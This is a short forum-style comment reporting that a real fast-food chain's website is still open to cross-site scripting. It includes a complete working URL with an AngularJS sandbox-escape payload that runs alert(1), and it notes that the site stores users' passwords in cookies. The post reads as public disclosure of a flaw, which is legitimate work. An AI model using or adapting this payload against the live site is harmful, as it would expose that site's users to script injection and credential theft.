
They still haven't fixed it. I'm only getting it to work in Chrome though, seems like the Angular sandbox escape doesn't work in Firefox. See for yourself (I'm only posting the more harmless alert demo, but the others work too):

  https://www.mcdonalds.com/us/en-us/search-results.html?q=%20{{x%20%3D%20{'y':''.constructor.prototype};%20x['y'].charAt%3D[].join;$eval('x%3Dalert(1)');}}

Then again, I wouldn't expect them to fix it very fast, considering how abysmal it is to basically store a user's password in a cookie in the first place.


